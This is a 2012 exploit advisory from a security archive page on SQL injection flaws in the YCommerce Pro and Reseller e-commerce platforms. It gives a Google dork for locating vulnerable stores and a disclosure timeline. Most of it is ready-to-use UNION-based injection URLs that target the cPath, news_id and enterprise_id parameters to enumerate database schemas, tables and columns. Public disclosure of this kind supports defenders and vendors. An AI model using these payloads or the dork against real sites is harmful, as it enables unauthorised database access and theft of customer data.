what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

YCommerce Pro / Reseller SQL Injection

YCommerce Pro / Reseller SQL Injection
Posted Sep 22, 2012
Authored by Ricardo Almeida

YCommerce Pro / Reseller suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 674c1ec52b72be8da7c68b254c57f1fa20b169ec82242c6089ef21eab6bd8f64

YCommerce Pro / Reseller SQL Injection

Change Mirror Download
# Exploit Title: YCommerce Pro/Reseller SQL Injection Vulnerability
# Google Dork: intext:desenvolvido por partteam.com - Plataforma YCommerce
# Date: 2012-09-21
# Exploit Author: Ricardo Almeida ricardojba@aeiou.pt
# Vendor Homepage: http://www.partteam.com
# Software Link: N/A
# Version: YCommerce Pro and YCommerce Reseller
# Tested on: N/A
# CVE: N/A


-- Affected Vendors:
---------------------
Partteam [M.S.N.F Soluções Informáticas, Lda.]


-- Affected Products:
---------------------
YCommerce [Reseller and Pro versions]



-- Disclosure Timeline:
-----------------------
2012-08-20 - Vendor Notification.
2012-08-30 - New Vendor Notification.
2012-09-20 - No Vendor Response / Feedback till date.
2012-09-21 - Public Disclosure.


Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


-- Disclaimer:
--------------
The information provided in this advisory is provided as it is without any warranty.
I am not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
I do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close